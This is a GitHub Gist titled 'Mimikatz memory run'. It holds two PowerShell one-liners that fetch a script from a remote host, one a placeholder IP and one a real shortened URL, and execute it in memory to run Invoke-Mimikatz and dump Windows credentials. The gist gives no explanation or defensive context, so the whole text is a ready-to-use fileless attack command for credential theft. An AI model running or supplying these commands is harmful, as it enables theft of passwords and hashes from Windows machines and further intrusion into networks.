Last active
August 8, 2022 23:21
-
-
Save ivanvza/66a7a6016457c5a4ab56918971b2fd2e to your computer and use it in GitHub Desktop.
Mimikatz memory run
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<mimikatz location>'); Invoke-Mimikatz -DumpCreds" | |
--- | |
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment